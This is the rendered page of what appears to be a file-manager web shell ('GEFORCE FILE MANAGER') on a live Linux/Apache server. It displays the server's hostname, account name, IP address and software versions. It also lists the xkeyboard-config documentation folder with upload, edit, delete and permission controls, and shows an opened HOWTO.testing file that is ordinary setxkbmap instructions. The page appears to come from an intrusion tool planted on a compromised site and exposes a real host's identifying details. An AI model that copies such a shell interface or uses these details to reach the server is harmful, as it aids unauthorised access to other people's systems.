[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.19
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
share
/
doc
/
xkeyboard-config
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 AUTHORS
510 B
SET
[ EDIT ]
|
[ DEL ]
📄 COPYING
9,244 B
SET
[ EDIT ]
|
[ DEL ]
📄 HOWTO.testing
861 B
SET
[ EDIT ]
|
[ DEL ]
📄 HOWTO.transition
2,303 B
SET
[ EDIT ]
|
[ DEL ]
📄 NEWS
4,918 B
SET
[ EDIT ]
|
[ DEL ]
📄 README
1,627 B
SET
[ EDIT ]
|
[ DEL ]
📄 README.config
7,515 B
SET
[ EDIT ]
|
[ DEL ]
📄 README.enhancing
23,948 B
SET
[ EDIT ]
|
[ DEL ]
📄 README.symbols
1,882 B
SET
[ EDIT ]
|
[ DEL ]
📄 TODO
531 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: HOWTO.testing
A mini-HOWTO test the XKB config without modifying the system configuration. (Only tested with XFree86 4.3+.) First see what your configuration is. Note the model and layout. $ setxkbmap -print Then unpack the sources locally ... $ gzip -dc xkeyboard-config*.tar.gz | tar -tf - ... and change to the delivered directory $ cd xkeyboard-config-<version> Then try to load the current keyboard using the local rules $ setxkbmap -v 10 -I$PWD -rules base Now try to set different keyboards using the -model and -layout. $ setxkbmap -v 10 -I$PWD -rules base -model pc102 -layout intl Look in the file rules/base for other example models and layouts If there was a problem, you can reset the keyboard like so: $ setxkbmap -rules xfree86 -model <noted model> -layout <noted layout> If that doesn't work, you may have to log out and log back in.